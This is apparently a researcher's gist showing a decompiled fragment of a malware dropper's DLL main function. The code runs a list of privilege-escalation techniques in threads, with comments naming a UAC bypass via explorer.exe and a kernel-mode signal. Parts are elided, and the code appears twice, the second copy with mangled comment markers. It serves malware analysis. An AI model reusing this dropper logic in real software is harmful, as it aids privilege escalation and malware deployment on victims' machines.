SouhailHammou/Avtr_dllmain.c

## Avtr_dllmain.c
/*2nd level dropper : DLL main function*/
{
/*[...]*/

	pavtr_listelem Elem = gList;
	while ( Elem != NULL )
	{
		HANDLE hThread = CreateThread(NULL,NULL,Avtr_ThreadProc,Elem,0);
		if ( ! hThread )
			break;
		CloseHandle(hThread);

		DWORD wfso_ret = 0;
		if ( Elem->technique != 0x80000000 )
		{
			wfso_ret = WaitForSingleObject(hGlobal03,Elem->milliseconds); //explorer.exe & UAC bypass
			if ( wfso_ret == WAIT_OBJECT_0 )
			{
				Elem->n_tries = 0;
			}
		}

		if ( wfso_ret == 0 && Elem->privilege_value != 0 )
		{
			wfso_ret = WaitForSingleObject(hGlobal02,Elem->milliseconds); //Always ; Event signaled from kernelmode
			if ( wfso_ret == WAIT_OBJECT_0 )
			{
				SetEvent(hGlobal17);
				break;
			}
		}
		int n_tries = Elem->n_tries - 1;
		Elem->n_tries = n_tries;
		if ( n_tries <= 0 )
		{
			Elem = List_GetNextElem();
		}
	}
	Sleep(1000);
	CloseHandle(hGlobal03);
	CloseHandle(hGlobal02);

	return var_C;
}
	/2nd level dropper : DLL main function/
	{
	/[...]/

	pavtr_listelem Elem = gList;
	while ( Elem != NULL )
	{
	HANDLE hThread = CreateThread(NULL,NULL,Avtr_ThreadProc,Elem,0);
	if ( ! hThread )
	break;
	CloseHandle(hThread);

	DWORD wfso_ret = 0;
	if ( Elem->technique != 0x80000000 )
	{
	wfso_ret = WaitForSingleObject(hGlobal03,Elem->milliseconds); //explorer.exe & UAC bypass
	if ( wfso_ret == WAIT_OBJECT_0 )
	{
	Elem->n_tries = 0;
	}
	}

	if ( wfso_ret == 0 && Elem->privilege_value != 0 )
	{
	wfso_ret = WaitForSingleObject(hGlobal02,Elem->milliseconds); //Always ; Event signaled from kernelmode
	if ( wfso_ret == WAIT_OBJECT_0 )
	{
	SetEvent(hGlobal17);
	break;
	}
	}
	int n_tries = Elem->n_tries - 1;
	Elem->n_tries = n_tries;
	if ( n_tries <= 0 )
	{
	Elem = List_GetNextElem();
	}
	}
	Sleep(1000);
	CloseHandle(hGlobal03);
	CloseHandle(hGlobal02);

	return var_C;
	}